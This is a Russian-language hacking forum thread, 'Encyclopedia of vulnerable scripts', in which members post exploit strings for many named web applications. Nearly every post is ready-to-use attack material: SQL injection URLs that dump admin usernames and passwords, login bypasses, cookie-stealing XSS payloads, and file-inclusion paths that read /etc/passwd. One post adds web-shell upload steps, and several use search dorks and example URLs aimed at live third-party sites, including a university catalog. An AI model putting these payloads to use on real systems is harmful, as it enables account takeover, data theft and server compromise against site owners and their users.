Энциклопедия уязвимых скриптов

Discussion in 'Веб-уязвимости' started by DIAgen, 1 Jun 2006.

  1. OptimaPrime

    OptimaPrime Banned

    Joined:
    30 Mar 2007
    Messages:
    307
    Likes Received:
    588
    Reputations:
    -61
    PRO-search

    XSS:
    Уязвимости в параметрах prot, host, path, name, ext, size, search_days, show_page

    Code:
    http://site/?prot=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
    Code:
    http://site/?host=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
    Code:
    http://site/?path=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
    Code:
    http://site/?name=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
    Code:
    http://site/?ext=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
    Code:
    http://site/?size=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
    Code:
    http://site/?search_days=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
    Code:
    http://site/?show_page=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
     
  2. ~!DoK_tOR!~

    ~!DoK_tOR!~ Banned

    Joined:
    10 Nov 2006
    Messages:
    673
    Likes Received:
    357
    Reputations:
    44
    Web Directory Script <= 2.0 (name) SQL Injection Vulnerability

    magic_quotes_gpc = Off

    http://localhost/[installdir]/

    Exploit:

    Code:
    listing_view.php?name='+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15+from+members/*
    http://milw0rm.com/exploits/6298

    Matterdaddy Market 1.1 Multiple SQL Injection Vulnerabilities

    magic_quotes_gpc = Off

    http://localhost/[installdir]/

    Exploit:

    Code:
    index.php?category='+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,13/*
    Code:
    index.php?type='+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,13/*
    Dork:

    made by matterdaddy

    http://milw0rm.com/exploits/6297

    (c)~!Dok_tOR!~
     
  3. ~!DoK_tOR!~

    ~!DoK_tOR!~ Banned

    Joined:
    10 Nov 2006
    Messages:
    673
    Likes Received:
    357
    Reputations:
    44
    iFdate <= 2.0.3 Remote SQL Injection Vulnerability

    Condition: magic_quotes_gpc = Off

    http://localhost/[installdir]/members_search.php

    Search Name/Nickname

    Exploit 1:

    Code:
    ' union select 1,concat_ws(0x3a,admin_username,admin_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58 from ifdate_admins/*
    Exploit 2:

    Code:
    ' union select 1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58 from ifdate_users/*
    http://milw0rm.com/exploits/6315
    (c) ~!Dok_tOR!~
     
  4. ~!DoK_tOR!~

    ~!DoK_tOR!~ Banned

    Joined:
    10 Nov 2006
    Messages:
    673
    Likes Received:
    357
    Reputations:
    44
    Battle Scrypt SQL Injection

    Author: ~!Dok_tOR!~
    Date found: 26.08.08
    Product: Battle Scrypt
    Download script: _http://rapidshare.com/files/114200827/BattleScrypt_PHP_NULLIFIED.rar.html
    Vulnerability Class: SQL Injection
    Condition: magic_quotes_gpc = Off

    Code:
    http://localhost/[COLOR="DarkOrange"][B][installdir][/B][/COLOR]/search.php
    Model Name:

    Exploit:

    Code:
    ' union select 1,user(),3/*
    Code:
    http://localhost/[COLOR="DarkOrange"][B][installdir][/B][/COLOR]/stats.php?id=' union select 1,2,3,4,5,6,7,8,9,10,11/*

    Big Fat Rate My Photo AdSense Website SQL Injection

    Author: ~!Dok_tOR!~
    Date found: 29.08.08
    Product: Big Fat Rate My Photo AdSense Website
    Price: $14.99
    URL: www.dotcomallsorts.com
    Download script: _http://89.223.37.140/files/scripter/Big%20Fat%20Rate%20My%20Photo%20AdSense%20Website.rar
    Vulnerability Class: SQL Injection

    Exploit 1:

    Code:
    http://localhost/[COLOR="DarkOrange"][B][installdir][/B][/COLOR]/viewcomments.php?phid=-1+union+select+1,concat_ws(0x3a,username,password),3,4,5,6+from+admin/*
    Exploit 2:

    Code:
    http://localhost/[COLOR="DarkOrange"][B][installdir][/B][/COLOR]/viewcomments.php?phid=-1+union+select+1,concat_ws(0x3a,username,password),3,4,5,6+from+members/*
    Admin panel:

    Code:
    http://localhost/[COLOR="#ff8c00"][B][installdir][/B][/COLOR]/admin/

    Article Publisher Pro <= v1.5 SQL Injection

    Author: ~!Dok_tOR!~
    Date found: 30.08.08
    Product: Article Publisher Pro v1.5
    Price: $75
    URL: www.phparticlescript.com
    Vulnerability Class: SQL Injection

    Exploit 1:

    Code:
    http://localhost/[COLOR="DarkOrange"][B][installdir][/B][/COLOR]/articles.php?art_id=1+union+select+1,2,concat_ws(0x3a,aut_username,aut_password),4,5,6,7+from+flaxweb_authors+where+aut_id=1/*
    Exploit 2:

    Code:
    http://localhost/[COLOR="DarkOrange"][B][installdir][/B][/COLOR]/userarticles.php?aut_id=-1+union+select+1,concat_ws(0x3a,aut_username,aut_password),3,4,5,6,7,8,9,10,11+from+flaxweb_authors+where+aut_id=1/*
    Dork:

    All rights reserverd © Your Articles Pro 2002-2005
    Copyright 2006 - 2008, Article Publisher PRO v1.5


    Keepsakes SQL Injection

    Author: ~!Dok_tOR!~
    Date found: 28.08.08
    Product: Keepsakes
    Price: $25
    URL: harlandscripts.com
    Vulnerability Class: SQL Injection
    Condition: magic_quotes_gpc = Off

    Exploit 1:

    Code:
    http://localhost/[COLOR="#ff0000"][installdir][/COLOR]/details.php?user=-1'+union+select+concat_ws(0x3a,username,password),2,3,4,5,6,7,8,9,10,11,12+from+admin_sign/*
    Opera -> Source(Ctrl+F3)

    Exploit 2:

    Code:
    http://localhost/[COLOR="DarkOrange"][B][installdir][/B][/COLOR]/details.php?user=-1'+union+select+concat_ws(0x3a,username,password),2,3,4,5,6,7,8,9,10,11,12+from+members/*
    Opera -> Source(Ctrl+F3)

    Exploit 3:

    Code:
    http://localhost/[COLOR="DarkOrange"][B][installdir][/B][/COLOR]/details.php?user=-1'+union+select+concat_ws(0x3a,username,password),2,3,4,5,6,7,8,9,10,11,12+from+affiiiates/*
    Opera -> Source(Ctrl+F3)

    Exploit 4:

    Code:
    http://localhost/[COLOR="DarkOrange"][B][installdir][/B][/COLOR]/showtime.php?pid=-1'+union+select+1,2,3,user(),5,6,concat_ws(0x3a,username,password),8,9,10,11,12,13,14,15,16,version(),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40+from+admin_sign/*
    Exploit 5:

    Code:
    http://localhost/[COLOR="DarkOrange"][B][installdir][/B][/COLOR]/showtime_noborder.php?pid=-1'+union+select+1,2,3,user(),5,6,concat_ws(0x3a,username,password),8,9,10,11,12,13,14,15,16,version(),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40+from+admin_sign/*
    Admin panel:

    Code:
    http://localhost/[COLOR="#ff8c00"][B][installdir][/B][/COLOR]/admin/
    Dork:

    Copyright Your Keepsakes ® ™ 2007


    Smart Traffic 6 in 1 SQL Injection

    Author: ~!Dok_tOR!~
    Date found: 30.08.08
    Product: Smart Traffic 6 in 1
    Download script: _http://rapidshare.com/files/139785932/smarttraffic.rar
    Vulnerability Class: SQL Injection
    Condition: magic_quotes_gpc = Off

    Exploit:

    Code:
    http://localhost/[COLOR="DarkOrange"][B][installdir][/B][/COLOR]/inc.groups.php?pid=-1%27+union+select+1,2,concat_ws(0x3a,login,pswd,email)+from+members/*

    TopCoolive SQL Injection

    Author: ~!Dok_tOR!~
    Date found: 30.08.08
    Product: TopCoolive
    URL: www.vetton.ru
    Vulnerability Class: SQL Injection
    Condition: magic_quotes_gpc = Off

    Exploit 1:

    Code:
    http://localhost/[COLOR="DarkOrange"][B][installdir][/B][/COLOR]/stats.php?id='+union+select+1,user(),password,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+from+new/*
    Exploit 2:

    Code:
    http://localhost/[COLOR="DarkOrange"][B][installdir][/B][/COLOR]/stat_res.php?id='+union+select+1,2,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+from+new/*
    Exploit 3:

    Code:
    http://localhost/[COLOR="DarkOrange"][B][installdir][/B][/COLOR]/img.php?id='+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,password,30,31,32,33,34+from+new/*

    Warez Script (by Mikel Dean) SQL Injection

    Author: ~!Dok_tOR!~
    Date found: 27.08.08
    Product: Warez Script
    Download script: _http://rapidshare.com/files/98446563/Warez_Script_English_by_Mikel_Dean.rar
    Vulnerability Class: SQL Injection
    Condition: magic_quotes_gpc = Off

    Exploit 1:

    Code:
    http://localhost/[COLOR="DarkOrange"][B][installdir][/B][/COLOR]/v2/index.php?section=download&id='+union+select+1,2,3,4,concat_ws(0x3a,username,password)+from+ddl_users/*
    Exploit 2:

    Code:
    http://localhost/[COLOR="DarkOrange"][B][installdir][/B][/COLOR]/v2/index.php?section=list&subcat='+union+select+1,2,3,concat_ws(0x3a,username,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+ddl_users/*
    Code:
    http://localhost/[COLOR="#ff8c00"][B][installdir][/B][/COLOR]/v2/index.php?section=post_upload&cat='+union+select+1,2,3,4/*
    Admin Authentication Bypass

    Code:
    http://localhost/[COLOR="DarkOrange"][B][installdir][/B][/COLOR]/v2/login.php
    User: 1' or 1=1/*
    Pass: 1' or 1=1/*

    (c) ~!Dok_tOR!~
     
    #64 ~!DoK_tOR!~, 12 Sep 2008
    Last edited: 19 Sep 2008
  5. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    392
    Likes Received:
    694
    Reputations:
    405
    На милворме был выложен эксплоит к E-Php CMS (http://milw0rm.com/exploits/6483) от разработчика www.ephpscripts.com, я решил проверить на наличие уязвимостей остальные их проекты (названия таблицы и колонок не были указаны, они одинаковые на всех скриптах).

    E-Php B2B Trading Marketplace Script (listings.php cid) Remote SQL Injection Vulnerability

    Exploit: http://www.site.com/listings.php?browse=sell&cid=-1+union+select+1,concat(es_admin_name,0x3a,es_pwd),3,4,5,6,7,8+from+ephpb2b_admin/*

    Example:
    http://www.ephpscripts.com/demo/b2b/listings.php?browse=sell&cid=-1+union+select+1,concat(es_admin_name,0x3a,es_pwd),3,4,5,6,7,8+from+ephpb2b_admin/*



    E-Php Shop Script (search_results.php cid) Remote SQL Injection Vulnerability

    Exploit:
    http://www.site.com/search_results.php?cid=-1+union+select+concat(es_admin_name,0x3a,es_pwd),2+from+ephpb2b_admin/*

    Example:
    http://www.ephpscripts.com/demo/yng_wineshop/search_results.php?cid=-1+union+select+concat(es_admin_name,0x3a,es_pwd),2+from+ephpscri_b2badeel.ephpb2b_admin/*
     
  6. balt

    balt Banned

    Joined:
    30 Oct 2008
    Messages:
    7
    Likes Received:
    13
    Reputations:
    -11
    Fundlink
    SQL:

    Code:
    site.com/showcategory.php?id=-99999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/users
    PHP-Newsletter
    SQL:
    Code:
    site/index.php?pgid=4&cat_id=-99999/**/union/**/select/**/1,1,1,concat(email,0x7c,username,0x7c,password),0x3a,1,1,1,1,1/**/from/**/users/*where%20admin1,1

    Com Endeavors

    SQL:
    Code:
    site.com/index.php?go=detail&id=-99999/**/union/**/select/**/0,0,0,0,0,0,0,0,0,0,0x7c,email,0x3a,
    concat(username,0x3a,password),1,1,1,1,1,1,2,2,2,2,2
    /**/from/**/admin/*where,limit,2--

    niccell

    SQL:
    Code:
    site.com/list.php?pagenum=S@BUN&categoryid=9999+union+select+111,222,
    concat(login,0x3a,password),444+from+admin_login/*
    KwsPHP
    SQL:
    Code:
    site.com/index.php?mod=galerie&action=gal&id_gal=-99999/**/union/**/select/**/0,1,concat(pseudo,0x3a,pass),concat(pseudo,0x3a,pass),4,5,6,7/**/from/**/users/*
    Esy
    SQL:
    Code:
    site.com/sections.php?op=viewarticle&artid=-9999999/**/union/**/select/**/0,1,aid,pwd,4/**/from/**/nuke_authors/*
    Code:
    site.com/ sections.php?op=printpage&artid=-9999999/**
    /union/**/select/**/aid,pwd/**/from/**/nuke_authors/*
    BosClassifieds Classified Ads System
    SQL:
    Code:
    site.com/bosclassifieds/index.php?cat=[SQL]
    pollBooth

    SQL:
    Code:
    site.com/pollBooth.php?op=results&pollID=-1+union+select+password,1,2,3+from+users
    
    RS MAXSOFT
    SQL:
    Code:
    site.com/modules/fotogalerie/popup_img.php?fotoID=-1+union+select+concat(login,0x3a,pass)+from+admin
    
    SSWD
    SQL:
    Code:
    site.com/index.php?go=subcat&id=-999/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6/**/from/**/admin/*
    OpenLD
    SQL:
    Code:
    site.com/index.php?id=999/**/UNION/**/SELECT/**/ALL/**/null,null,null,null,null,value,null,null,null,null  ,null,null,null,null/**/FROM/**/settings--
    

    Site Sift

    SQL:
    Code:
    site.com/ndex.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16/**/from/**/admin/*
    
    Code:
    site.com/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6,7,8,9,
    10,11,12,13,14,15,16,17,18,19,20/**/from/**/admin/*
    

    Showlink

    SQL:
    Code:
    site.com/index.php?showlink=ulus&fid=ulus8&p=links&area=1&categ=-1+union+select+0,concat(email,0x3a,pass),2+from+kpro_user
    

    eSyndiCat

    SQL:
    Code:
    site.com/news.php?id=-1%27%20union%20select%201,username,password,4,5%20 from%20dir_admins/*
    Bwired

    SQL: i
    Code:
    site.com/ndex.php?newsID=-99%20union%20all%20select 1, 2,concat(user_login,0x20,0x3a,0x20,user_passwd),4, 5, 6, 7, 8, 9, 10, 11%20from%20authuser
    

    Md-Pro

    SQL:
    Code:
    site.com/index.php?module=Topics&func=
    view&topicid=-1 UNION ALL SELECT null,null,concat
    (pn_uname,0x3a,pn_pass),null,null, null,null from md_users where pn_uid=2/*

    eMeeting Online Dating Software

    SQL:
    Code:
    site.com/b.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(username,0x3a,password),5,6,7,8,9,10/**/from/**/members/*
    Code:
    site.com/b.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(username,0x3a,password),5,6,7,8,9,10/**/from/**/members/**/where/**/username=0x61646D696E/*
    FlashGameScript
    SQL:
    Code:
    site.com/index.php?func=member&user='+union+select+0,0,0,0, 0,0,0,0,0,0,username,password,0,0,0,0,0,user_type+
    from+members+where+user_type=2/*
    Code:
    site.com/index.php?func=member&user='+union+select+0,0,0,0,
    0,0,0,0,0,0,username,password,0,0,0,0,user_type+fr
     om+members+where+user_type=2/*
     
  7. Dimi4

    Dimi4 Чайный пакетик

    Joined:
    19 Mar 2007
    Messages:
    756
    Likes Received:
    1,053
    Reputations:
    291
    Author: Dimi4
    Date found: 30.10.08
    Product: Image Hosting System v1.3.4
    Price: n\q
    URL: www.webmastersadvantage.com (http://www.1phpscripts.com/Image_Hosting_System_Script.html)
    Vulnerability Class: XSS
    Vulnerability Script:viewimage.php
    PHP:
    <?
        
    $file $_GET['file'];
        if (
    $file == "") {
            
    header("Location: " $server_url);
            exit;
        }
    .....

    <
    img src="<?= $file ?>
    Мда.. понял всё это зря... Открыта Админка ;)
    Default path:/imageadmin/

     
    2 people like this.
  8. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    CMS Made Simple 1.4.1, возможно более старые версии.

    Активная XSS в админке.
    Уязвимый параметр: название новой категории при ее добавлении в Content -> News -> Categories (также уязвимы имена Field Definitions).

    Чтобы "заставить" админа внедрить в название наш код, необходимо провести CSRF-атаку. Данные передаются через POST, но можно передать и GET'ом.

    Формируем ссылку:
    Code:
    http://[I]путь_до_каталога_CMS/[/I]admin/moduleinterface.php?mact=News,m1_,addcategory,0&m1_name=[COLOR=Yellow][B][XSS][/B][/COLOR]
    Лучше подгружать во фрейме. :rolleyes:

    XSS будет доступна на странице:
    Code:
    http://[I]путь_до_каталога_CMS[/I]/admin/moduleinterface.php?module=News
    (с) iddqd

    Через жопу конечно, но все равно ;)
     
    5 people like this.
  9. Smapt

    Smapt Elder - Старейшина

    Joined:
    29 Jan 2008
    Messages:
    31
    Likes Received:
    32
    Reputations:
    3
    StrawBerry 1.1.1 (бывший CuteNews)

    Инклюд для версии с TXT базами:
    Code:
    http://localhost/example/index.php?do=../../../../db/base/users.MYD%00
    
    Инклюд по такому принципу присутствует во всех ТХТ версиях StrawBerry и CuteNews

    Заливка шела:
    Админка->Настройки->Управление картинками
    переименовываем шелл в .jpg и заливаем на серв.
    Жмём "переименовать", меняем разрешение обратно на пхп, получаем шел. Для StrawBerry 1.1.1, т.к. доступ к папке аплоад запрежён переименовываем в "../../shell.php" получаем _ttp://localhost/shell.php
     
  10. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    392
    Likes Received:
    694
    Reputations:
    405
    Active Business Directory v 2 (Auth Bypass) SQL Injection Vulnerability

    script: Active Business Directory v 2
    found: Ded MustD!e

    exploit: http://www.activewebsoftwares.com/demoactivebusinessdirectory/account.asp

    E-mail Address: ' or ' 1=1
    Password: ' or ' 1=1

    ASPReferral v 5.3 (Auth Bypass) SQL Injection Vulnerability

    script: ASPReferral v 5.3
    found: Ded MustD!e

    exploit: http://www.activewebsoftwares.com/demoaspreferral/Merchant.asp

    E-mail Address: ' or ' 1=1--
    Password: ' or ' 1=1--
     
    1 person likes this.
  11. Qwazar

    Qwazar Elder - Старейшина

    Joined:
    2 Jun 2005
    Messages:
    989
    Likes Received:
    904
    Reputations:
    587
    ExpressionEngine Core v. 1.6.6 и другие версии и модификации вроде бы тоже (пишут, что за бугром популярен)

    Алгоритм хеширования: sha1(pass) - по дефолту, или md5(pass).

    XSS (Кстати, этим скриптом можно отправить кому угодно письмо с уязвимого сервера, с обратным адресом владельца блога):
    Code:
    POST: http://test1.ru/system/utilities/email_test.php 
    recipient=1"><script>alert(/XSS1/)</script>&subject=2"><script>alert(/XSS2/)</script>&message=3"></textarea><script>alert(/XSS3/)</script>
    
    При неудалённом install.php:
    LFI:
    Code:
    http://test1.ru/install.php?page=4
    system_dir=system&ext=/../../1.php
    //Если system_dir не system (по дефолту), то следует изменить на актуальный.
    
    LFI:
    Code:
    http://test1.ru/install.php?page=5
    ext=/../../1.php
    
    LFI:
    Code:
    http://test1.ru/install.php?page=6
    ext=/../../1.php
    LFI:
    Code:
    http://test1.ru/install.php?page=7
    rebuild_config=1&ext=/../../1.php
    
    Раскрытие путей :
    Code:
    http://test1.ru/system/utilities/admin.php
    http://test1.ru/system/utilities/dbtest.php
    Раскрытие путей (при register_globals=ON):
    Code:
    http://test1.ru/system/update.php?conf=1
    Раскрытие информации о пользователях, префикса таблиц БД, ip адресов юзеров(да и не только):

    Папки не спрятаны .htaccess'ом, в диком интернете в db_cache можно найти интересную информацию:
    Code:
    /system/cache/sql_cache/
    /system/cache/db_cache/
    /system/cache/magpie_cache/
    /system/cache/page_cache/
    /system/cache/tag_cache/
    
    Например: http://concerningdesign.org/system/cache/db_cache/6a992d5529f459a44fee58c733255e86/6c6237982ae04c3a69cea9d2ca9a6a3e (информация о пользователях логин, мыло и т.п.)

    dork: "powered by ExpressionEngine" (кстати, действительно, довольно много)
     
    #71 Qwazar, 7 Dec 2008
    Last edited: 7 Dec 2008
    3 people like this.
  12. OptimaPrime

    OptimaPrime Banned

    Joined:
    30 Mar 2007
    Messages:
    307
    Likes Received:
    588
    Reputations:
    -61
    Energine

    скину сюда,потому что я ослеп,и не вижу тему "Уязвимости бесплатных ЦМС"

    SQL Inj:


    Code:
    site.com/news.php?id=-1%27%20union%20select%201,username,password,4,5%20 from%20dir_admins/*
    XSS:

    В поиск:
    Code:
    "><script>alert()</script>  
     
    1 person likes this.
  13. 0nep@t0p

    0nep@t0p Elder - Старейшина

    Joined:
    25 May 2007
    Messages:
    134
    Likes Received:
    216
    Reputations:
    17
    CMS: [ ACMS™ ]

    Developer: [ http://www.acalog.com/ ]

    Dork: [ Powered by the acalog™ academic catalog management system (ACMS™) inurl:"?coid=" ]

    Bug type: [ Blind Sql Injection ]

    Bug: [ coid=63+and+ascii(lower(substring((version()),1,1)))=52/* ]

    Example: [ http://catalog.sdstate.edu/preview_course.php?catoid=2&coid=63+and+ascii(lower(substring((version()),1,1)))=52/* ]


    Примечательно, что большинство сайтов с бажной цмс находятся в доменной зоне .edu
     
  14. Dimi4

    Dimi4 Чайный пакетик

    Joined:
    19 Mar 2007
    Messages:
    756
    Likes Received:
    1,053
    Reputations:
    291
    Уязвимости FAQMasterFlex

    [Уязвимости FAQMasterFlex]
    Условие: magic_quotes_gpc = OFF
    1.
    File:faq.php
    Уязвимый кусок кода:

    PHP:
     $result mysql_query("SELECT * FROM faqs WHERE category_id = '$category_id'") or die(mysql_error());
    SQL иньекция:

    Code:
    http://path/FAQMasterFlex/faq.php?answer=2&cat_name=FAQMasterFlex%20Usage&category_id=1'+union+select+1,2,concat_ws(0x3a,database(),version(),user()),4/*
    2.
    File:faq_admin.php
    Уязвимый кусок кода:

    PHP:
     $result mysql_query("SELECT * FROM faqs WHERE category_id = '$category'") or die(mysql_error());
    SQL иньекция:

    Code:
    http://path/FAQMasterFlex/faq_admin.php?category='+union+select+1,2,concat_ws(0x3a,database(),version(),user()),4/*&cat_name=
    Google dork:"Powered by Lethal Penguin."

    http://www.lethalpenguin.net/design/faqmasterflex.php?download=true
     
    2 people like this.
  15. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    Textpattern v.4.0.3

    Passive XSS
    Code:
    http://localhost/textpattern/index.php?event=tag&name=image&id=1&ext=[COLOR=Yellow][B]</textarea><script>alert(document.cookie)</script>[/B][/COLOR]&alt=&h=1&w=400&type=textile
    Code:
    http://localhost/textpattern/index.php?event=log&step=list&page=1[COLOR=Yellow][B]<script>alert(document.cookie)</script>[/B][/COLOR]
    Active XSS
    Написать новую статью => http://localhost/textpattern/index.php?event=article => в заголовок вставляем код
    Code:
    <script>alert()</script> или </title><script>alert()</script>
    Категории => уязвимо поле "Название".

    Файлы => поле "Описание".

    Ссылки => поля "Заголовок" и "Описание".

    (c) iddqd
     
    #75 iddqd, 14 Dec 2008
    Last edited: 15 Dec 2008
    2 people like this.
  16. Qwazar

    Qwazar Elder - Старейшина

    Joined:
    2 Jun 2005
    Messages:
    989
    Likes Received:
    904
    Reputations:
    587
    MODx 0.9.6.2

    Passive XSS
    Code:
    /assets/modules/docmanager/includes/tv.ajax.php
    POST: tplID=-1&langNoTV=<body onLoad=alert('ok')>
    Code:
    /assets/plugins/tinymce3101/tinymce.linklist.php?list=<script>alert(/XSS/)</script>
    register_globals [B]ON[/B]
    Code:
    /assets/snippets/ditto/extenders/request.extender.inc.php?dbg=1&stripTags=0&ditto_<script>alert(/XSS/)</script>
    register_globals [B]ON[/B]
    
    В этом случае забавно то, что XSS в имени параметра, а вот значение фильтруется жёстко.

    Раскрытия путей
    Code:
    assets/cache/siteCache.idx.php
    
    manager/includes/rss.inc.php
    manager/includes/browsercheck.inc.php
    manager/includes/sniff/phpSniff.class.php
    manager/includes/extenders/getUserData.extender.php
    
    assets/snippets/ditto/formats/xml.format.inc.php
    assets/snippets/ditto/formats/rss.format.inc.php
    assets/snippets/ditto/formats/json.format.inc.php
    assets/snippets/ditto/classes/debug.class.inc.php
    assets/snippets/ditto/formats/atom.format.inc.php
    assets/snippets/ditto/extenders/tagging.extender.inc.php
    
    manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php
    
    assets/plugins/tinymce3101/jscripts/tiny_mce/plugins/spellchecker/classes/PSpell.php
    assets/plugins/tinymce3101/jscripts/tiny_mce/plugins/spellchecker/classes/GoogleSpell.php
    assets/plugins/tinymce3101/jscripts/tiny_mce/plugins/spellchecker/classes/EnchantSpell.php
    assets/plugins/tinymce3101/jscripts/tiny_mce/plugins/spellchecker/classes/PSpellShell.php
     
    1 person likes this.
  17. OptimaPrime

    OptimaPrime Banned

    Joined:
    30 Mar 2007
    Messages:
    307
    Likes Received:
    588
    Reputations:
    -61
    bbpress

    bbpress v1.0


    File:
    realplay.php

    Уязвимый кусок кода:

    Code:
    <?php
    echo (get_magic_quotes_gpc() ? stripslashes($_GET['link']) : $_GET['link']);
    ?>
    XSS иньекция:

    Code:
    http:/path/inc/realplay.php?link=%3Cscript%3Ealert(document.cooki e)%3C/script%3E


    Активная XSS:



    В /inc/realplay.php поле email вводим:

    Code:
    <script>alert()</script>
     
    #77 OptimaPrime, 20 Dec 2008
    Last edited: 20 Dec 2008
  18. OptimaPrime

    OptimaPrime Banned

    Joined:
    30 Mar 2007
    Messages:
    307
    Likes Received:
    588
    Reputations:
    -61
    WorkingOnWeb

    File: admin.inc.php

    Уязвимый кусок кода:

    Code:
    $user = "";
    $pass = "";
    if (isset($_POST['loginname']) && $_POST['loginname'] != "")
    $user = $_POST['loginname'];
    if (isset($_POST['loginpass']) && $_POST['loginpass'] != "")
    $pass = $_POST['loginpass'];
    $loggedin = $this->loginuser($user, $pass);
    

    SQL Иньекция:

    Code:
    http://path/articles/rss.php?category=-1/**/union/**/select/**/1,2,login,password/**/from/**/users/*
    

    XSS иньекция:

    Code:
    http://path/wow/index.php/"><script>alert(document.cookie)</script>
    
     
  19. OptimaPrime

    OptimaPrime Banned

    Joined:
    30 Mar 2007
    Messages:
    307
    Likes Received:
    588
    Reputations:
    -61
    iGaming CMS


    Файл: lang.php
    Уязвимый код:
    Code:
    if(isset($_GET['lang']))   
    
        $include_lang = $_GET['lang'];
    }
    elseif(file_exists(TOP_DIR.'/sql/db_connect.php'))
    {
        include_once(TOP_DIR.'/functions/db_api.php');
        $include_lang = get_language();
    }
    else
    {
        $include_lang = get_http_accept_lang();
    }
    include_once(TOP_DIR.'/lang/lang.'.$include_lang.'.php');
    
    Code:
    http://path/docs/index.php?lang=/../../../../../../../../../../test
    
    Если magic_quotes_gpc = Off,тогда:

    Code:
    http://path/docs/index.php?lang=/../../../../../../../../../../etc/passwd%00
    
    Файл: install.php


    Уязвимый код:

    Code:
    switch($_GET['whatlang'])
    {
    case 1:
        include_once(TOP_DIR.'/lang/lang.'.@$_GET['language'].'.php');
        break;
    
        default:
        include_once(TOP_DIR.'/lang/lang.English.php');
        break;
    }
    Code:
    http://path/install.php?whatlang=1&language=/../../../../../../../test
    
    Если magic_quotes_gpc = Off,то:

    Code:
    http://path/install.php?whatlang=1&language=/../../../../../../../etc/passwd%00
    SQL иньекция:

    Code:
    http://path/index.php?sideid=28+union+select+concat(username,0x3a,password),2,3+from+login/*
    XSS иньекция:
    Code:
    http://path/search/?q=%22%3E%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E
     
    #79 OptimaPrime, 21 Dec 2008
    Last edited: 22 Dec 2008
  20. OptimaPrime

    OptimaPrime Banned

    Joined:
    30 Mar 2007
    Messages:
    307
    Likes Received:
    588
    Reputations:
    -61
    Wheatblog


    Файл: main.php
    Кусок уязвимого кода:
    Code:
    $config = ereg_replace(":","", $config);
    
    $config = trim(ereg_replace("../","", $config));
    
    $config = trim(ereg_replace("/","", $config));
    
    if (($config=="")|| (!eregi(".inc.php",$config))){$config="config.inc.php"; echo "<!--$config-->\n";}
    
    Code:
    http://path/main.php?config=eregi.inc.php\\..\\admin\\.htaccess
    
    Если magic_quotes_gpc =ON,то:
    Code:
    http://path/main.php?config=eregi.inc.php\..\admin\.htaccess
    
    XSS иньекция:

    Code:
    http://path/index.php?action=category&id=<script>alert(document.cookie)</script>
    
     
    1 person likes this.
Loading...